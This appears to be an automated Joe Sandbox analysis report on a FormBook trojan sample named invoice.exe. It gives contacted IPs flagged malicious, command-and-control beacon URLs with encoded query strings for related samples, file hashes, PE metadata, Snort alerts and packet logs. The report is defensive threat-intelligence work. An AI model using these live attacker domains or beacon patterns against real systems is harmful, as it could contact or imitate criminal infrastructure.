https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
https://pre-mpnewyear.uc.cn/iceberg/page/log?domain=	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	C5G1Z47d2.12.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
http://en.w	invoice.exe, 00000000.00000003.241728711.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.sedo.com/services/parking.php3	msiexec.exe, 0000000C.00000002.510045303.0000000004D06000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	C5G1Z47d2.12.dr	false		high
https://search.yahoo.com?fr=crmas_sfp	msiexec.exe, 0000000C.00000002.506380839.000000000085C000.00000004.00000020.00020000.00000000.sdmp, C5G1Z47d2.12.dr	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://181ue.com/sq.html?entry=	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://image.uc.cn/s/uae/g/3o/berg/static/index.e39146d1af90e9bff26d.css	msiexec.exe, 0000000C.00000002.510153146.0000000004E98000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000C.00000002.510606216.0000000006C60000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	invoice.exe, 00000000.00000002.289469461.00000000068E2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	C5G1Z47d2.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
35.241.57.73	www.53kzl.xyz	United States	15169	GOOGLEUS	false
64.190.62.22	bunniesfor-sales.site	United States	11696	NBS11696US	true
194.58.112.174	www.soft-r.pro	Russian Federation	197695	AS-REGRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	723910
Start date and time:	2022-10-16 05:28:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	invoice.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/2@3/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 45.5% (good quality ratio 40.1%) Quality average: 72.5% Quality standard deviation: 32.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 76 Number of non-executed functions: 186
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:29:11	API Interceptor	1x Sleep call for process: invoice.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
64.190.62.22	P20022-1 #U8fd0#U8f93#U6807#U5fd7#U827a#U672f#U54c1.exe	Get hash	malicious	Browse	www.eatingdisorderstest.site/fqsu/?a2Mt=xk6i6ju7uyGJAv0GqYksjhnivYuyro4E4/NIPmHTYevtJYZNH5n8Z9jyzYWFJnJO8IszM6QHCx0egY+UBZ58lTA139Sus0e2Hw==&Xv24iL=NL3ddH7hl
	obizx.exe	Get hash	malicious	Browse	www.seniorscruisepackage.site/oy10/?AVTTP=QvHl7bW0Nr18aHm&-Z-TJVk=9dnqmll9rLW7kqvnayYvCVD2dHHSlIQ8NDFZBOMmRvs1vIOn+n78aJSSRgkOUlPPU362
	eXHIp5j83B.exe	Get hash	malicious	Browse	www.comprar-carros.cloud/vez2/?7nup=Eni8vXmMw4VNdCh9DupkUUi7KdIMq910zMRj4j0M+xMzLAsygWVEwk+8hupEsLVbjTYtyi3gbFdyt/Ow4skJiP31Sy32WNOvuA==&e6R=R4wlwlT
	DHL DOCUMENT.exe	Get hash	malicious	Browse	www.bunniesfor-sales.site/bbuy/?mPPlK=6I6VNooPkz6TucAAbiypJ2kF9iPQ2FDHmdSondeo43vbwFxNIZIJ4E2mj8DGZTm7vRAnx55UnYjEvEhmBbsa6NfCxZesqZsFKA==&cpLP=f0DDOhI
	DHL DOCS.exe	Get hash	malicious	Browse	www.eatingdisorderstest.site/fqsu/?IBZl=xk6i6ju7uyGJAv0GqYksjhnivYuyro4E4/NIPmHTYevtJYZNH5n8Z9jyzYWFJnJO8IszM6QHCx0egY+UBZ58lTA139Sus0e2Hw==&Uv=JzrHgB5pjjOX
	PURCHASE ORDER_xslx.exe	Get hash	malicious	Browse	www.housepaintingprice.site/h96v/?HJ=9KQq5Tqa0R8b07RM8v5v6EW/zbSwSDl0KAZwGQyOwb6ITYK/UXqq6lhB3JSL4gr+krDrlEpRO/EntRQB+Vrq+B9Eiuj+tUI/AQ==&7nY=oR-PKluho0z0shtp
	Netanya Farm project (Phase II).vbs	Get hash	malicious	Browse	www.phone-stores-near-me.shop/al24/
	DHL SHIPMENT.exe	Get hash	malicious	Browse	www.eatingdisorderstest.site/fqsu/?ihQLnJ=0L00d8QhhjjPCny&g6Ad=xk6i6ju7uyGJAv0GqYksjhnivYuyro4E4/NIPmHTYevtJYZNH5n8Z9jyzYWFJnJO8IszM6QHCx0egY+UBZ58lVE46cSut0G+Hw==
	KrIFtnpKX1UnZBH.exe	Get hash	malicious	Browse	www.new-dental-braces.today/qv4o/?C2Mtf=1SqdFJCwGOdAE5hnvIGvrXhQ/N8vSqeuOAVRI0PGT689RxjV5YzBTZ0RreadDYoriMhe8JcQVJ7IVqcXdMzhpSJiFilqj3SPzA==&L4p=-ZzX5ZzXNlD
	Purchase Order - 352072022-09-22.exe	Get hash	malicious	Browse	www.comprar-carros.cloud/vez2/?mL3d_=Eni8vXmMw4VNdCh9A/FhXU+5OdU8gYR0zMRj4j0M+xMzLAsygWVEwkC8hupEsLVbjTYtyi3gbFdyt/Ow4skIiIX5OHrdXNSO8Q==&6lip78=LN90bXc0DLRXi
	PO - 00442622092022.exe	Get hash	malicious	Browse	www.comprar-carros.cloud/vez2/?KRk0=Eni8vXmMw4VNdCh9DupkUUi7KdIMq910zMRj4j0M+xMzLAsygWVEwk+8hupEsLVbjTYtyi3gbFdyt/Ow4skJiJz4cRv2XNGnuA==&6lJxm=g488_fOpzNNXwBHP
	FedEX.exe	Get hash	malicious	Browse	www.personal-loan-1.com/cour/?a8_DM4yx=gimzLMJPxaMro+Bpsiqib5N7LBZ7CMp7/iDIe/T1v+SgQUOkj0NyQfdQFASl132JN0x0JaVkOXe8ctmzf6aRVeR7G2zZIeCirA==&FFN0=2dRlFh_p
	payment receipt.exe	Get hash	malicious	Browse	www.personal-loan-1.com/cour/?w0DLPNd=gimzLMJPxaMro+Bpsiqib5N7LBZ7CMp7/iDIe/T1v+SgQUOkj0NyQfdQFASl132JN0x0JaVkOXe8ctmzf6aRVeR7G2zZIeCirA==&9rFHcZ=3fudcX1
	AWB_3877.EXE.exe	Get hash	malicious	Browse	www.sunsolarpanelprice.xyz/jem9/?3fMDHJ=1bt8X8Vx&yR-xIzax=SXJ6TW7YH6zM4m27zuwFdsu0fpL90FlRjZumVaXiv2gN7pXrzeaJYPeK/3U81RjgNKHIzE/VdT0/F29s3K682FLn8fYQfkbTSg==
	V7dXXaAj3UU9Fjz.exe	Get hash	malicious	Browse	www.new-dental-braces.today/qv4o/?EN9=1SqdFJCwGOdAE5hnvIGvrXhQ/N8vSqeuOAVRI0PGT689RxjV5YzBTZ0RreadDYoriMhe8JcQVJ7IVqcXdMzsmxInOw8G2FumzQ==&j0DpK=w0DP3H4xB
	DOCUMENT OF FedEX.exe	Get hash	malicious	Browse	www.personal-loan-1.com/cour/?2d=gimzLMJPxaMro+Bpsiqib5N7LBZ7CMp7/iDIe/T1v+SgQUOkj0NyQfdQFASl132JN0x0JaVkOXe8ctmzf6aRVeR7G2zZIeCirA==&bVRLlF=nPVXr
	RFQ MT1000 FOB.exe	Get hash	malicious	Browse	www.stop-dog-diarrhea.site/t39h/?aPy4=1bHpi08P7Pbl&s62Xg0Q=K0zuMMDfISH9O4cN1GLIuKAqztNc3p+VZkIzv8II/Ga2iC3m7eARIZiuU3wK0K4w9Oap
	PI.exe	Get hash	malicious	Browse	www.eatingdisorderstest.site/ugez/?0L0PK8I=KiBK8HKIBJYu0AUU+hwXJEwXz7VQHnm27AelhPgZXANcfPHSLLvnHbOAq28E5h8VzZXGQNqpi1qLkWjaC9ZjwuEac525z8D/uA==&l48lb=i0DxHJy
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse	www.home-garden-2.xyz/b29a/?j8=LnARDuKUKJo2DWiOav7Wu6P08cvyPi9h5Vjj83SVHrVnloctx1e/ImIsJUL6calu4Lbn&0R=6l-lfDk
	Packing list.exe	Get hash	malicious	Browse	www.new-dental-braces.today/qv4o/?g2M=1SqdFJCwGOdAE5hnvIGvrXhQ/N8vSqeuOAVRI0PGT689RxjV5YzBTZ0RreadDYoriMhe8JcQVJ7IVqcXdMzhpQIgBh9qg3aHzA==&0TX02=1buHlvb

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NBS11696US	P20022-1 #U8fd0#U8f93#U6807#U5fd7#U827a#U672f#U54c1.exe	Get hash	malicious	Browse	64.190.62.22
	CLDy30IIDG.elf	Get hash	malicious	Browse	64.190.7.210
	AWB# DHL721500 Documento de recibo de env#U00edo de carga, pdf.exe	Get hash	malicious	Browse	64.190.63.111
	PEMBERITAHUAN PENGHANTARAN DHL EXPRESS UNTUK,PDF.exe	Get hash	malicious	Browse	64.190.63.111
	DHL EXPRESS LEVERINGSBERICHT VOOR,pdf.exe	Get hash	malicious	Browse	64.190.63.111
	obizx.exe	Get hash	malicious	Browse	64.190.62.22
	PAYMENT COPY.doc	Get hash	malicious	Browse	64.190.63.111
	PO 9419(Draft copy).vbs	Get hash	malicious	Browse	64.190.63.111
	eXHIp5j83B.exe	Get hash	malicious	Browse	64.190.62.22
	DHL DOCUMENT.exe	Get hash	malicious	Browse	64.190.63.111
	uuctgqafmcr.exe	Get hash	malicious	Browse	64.190.63.111
	CONFIRMAR DOCUMENTO DE PAGO.exe	Get hash	malicious	Browse	64.190.63.111
	Ref8810998235 Auto System Generated Order Form 061022.exe	Get hash	malicious	Browse	64.190.63.111
	sNSFnUIo2a.exe	Get hash	malicious	Browse	64.190.63.111
	FxI8KH8VlZ.vbs	Get hash	malicious	Browse	64.190.63.111
	Ref8810998235 Auto Generated Order Form.exe	Get hash	malicious	Browse	64.190.63.111
	78RVtF9obs.elf	Get hash	malicious	Browse	209.87.95.129
	Ref8810998235 Auto System Generated Order Form 051022.exe	Get hash	malicious	Browse	64.190.63.111
	ORDER_PO251455222785xls.js	Get hash	malicious	Browse	64.190.63.111
	Bestellbeleg _ TCW23955 _.exe	Get hash	malicious	Browse	64.190.63.111
AS-REGRU	7heMJ3AYNZ.exe	Get hash	malicious	Browse	31.31.196.159
	b0AYw478Oz.exe	Get hash	malicious	Browse	31.31.196.159
	Baker Hughes Svcs Int LLC Payment Advice.exe	Get hash	malicious	Browse	194.58.112.174
	EJ6FBXJ9Dg.exe	Get hash	malicious	Browse	31.31.198.19
	AOE9001.vbs	Get hash	malicious	Browse	195.133.18.63
	L5AoXj4g4X.exe	Get hash	malicious	Browse	31.31.196.159
	https://zoomcloudcomputing.tech/index.php?uid=9871d3a2c554b27151cacf1422eec048	Get hash	malicious	Browse	194.67.119.190
	file.exe	Get hash	malicious	Browse	194.87.216.7
	http://cloudupdatesss.com	Get hash	malicious	Browse	194.67.119.190
	dz0wzKoLP4.exe	Get hash	malicious	Browse	31.31.198.23
	file.exe	Get hash	malicious	Browse	31.31.198.23
	SecuriteInfo.com.Variant.Strictor.4358.6056.28402.exe	Get hash	malicious	Browse	195.133.18.110
	EO200056.vbs	Get hash	malicious	Browse	195.133.18.63
	DHL#U6536#U636e#U6587#U4ef6 _ 9905238986 _ 11102022#Uff0cpdf.exe	Get hash	malicious	Browse	195.133.18.130
	HQ700E40.vbs	Get hash	malicious	Browse	195.133.18.63
	Orden de Compra Urgente.exe	Get hash	malicious	Browse	194.58.112.174
	delivery certificate .doc	Get hash	malicious	Browse	31.31.196.21
	uuctgqafmcr.exe	Get hash	malicious	Browse	194.58.112.174
	Installer.bat	Get hash	malicious	Browse	89.108.65.136
	UI900437.vbs	Get hash	malicious	Browse	195.133.18.63

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log

Download File

Process:	C:\Users\user\Desktop\invoice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\C5G1Z47d2

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 4, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	94208
Entropy (8bit):	1.2882898331044472
Encrypted:	false
SSDEEP:	192:go1/8dpUXbSzTPJPn6UVuUhoEwn7PrH944:gS/inPvVuUhoEwn7b944
MD5:	4822E6A71C88A4AB8A27F90192B5A3B3
SHA1:	CC07E541426BFF64981CE6DE7D879306C716B6B9
SHA-256:	A6E2CCBD736E5892E658020543F4DF20BB422253CAC06B37398AA4935987446E
SHA-512:	C4FCA0DBC8A6B00383B593046E30C5754D570AA2009D4E26460833FB1394D348776400174C898701F621C305F53DC03C1B42CF76AA5DC33D5CCD8FA44935B03C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......-...........=......................................................[5...........*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.823794436720646
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	invoice.exe
File size:	965120
MD5:	6cb9c745dfa97e0e9c7f3c2cdefea36e
SHA1:	eb3e0a31eee4d3292f437a6894bf10742c5b9544
SHA256:	80315ef282c51636b3a9e174de8482d1bab51e044cba0b2cb915d7e48a551b64
SHA512:	5f552477218ac5f1f7e92f5331b4e7a88d75f7cbdb4fa7a32b2effba8e5d274013ef2b3942061bb32796cdd9b0c94baaa1fdb94f81d4050b5a20534457e76db4
SSDEEP:	12288:28jfFjL+poIA7tM8dT5H94Pk+NHnnKb91OL3AzZFIeGA2rUoMINM2W3:2aBgoJvp5EkQHnneuCTIeGvAo
TLSH:	5A256C1425E6421CF43A8BB5DBCBB4D58AE7FE219329E2AF14AD27464533E49CCD3231
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ic..............P.............^.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x4ece5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x63498089 [Fri Oct 14 15:30:17 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xece0b	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xee000	0x5a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xe7564	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xeae64	0xeb000	False	0.5952937998670212	data	6.830189645402675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xee000	0x5a0	0x600	False	0.4244791666666667	data	4.091271445263501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf0000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xee090	0x310	data
RT_MANIFEST	0xee3b0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.335.241.57.7349702802031449 10/16/22-05:30:57.590800	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49702	80	192.168.2.3	35.241.57.73
192.168.2.335.241.57.7349702802031412 10/16/22-05:30:57.590800	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49702	80	192.168.2.3	35.241.57.73
192.168.2.335.241.57.7349702802031453 10/16/22-05:30:57.590800	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49702	80	192.168.2.3	35.241.57.73

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 16, 2022 05:30:43.114115000 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.133363962 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.133522034 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.133881092 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.177969933 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178037882 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178083897 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178128004 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178169966 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178210974 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178252935 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178293943 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178334951 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178359032 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.178359032 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.178359032 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.178359032 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.178374052 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.178468943 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197158098 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197232008 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197277069 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197318077 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197360039 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197364092 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197405100 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197407961 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197447062 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197453976 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197510958 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197546005 CEST	80	49699	64.190.62.22	192.168.2.3
Oct 16, 2022 05:30:43.197557926 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197669983 CEST	49699	80	192.168.2.3	64.190.62.22
Oct 16, 2022 05:30:43.197865963 CEST	49699	80	192.168.2.3	64.190.62.22
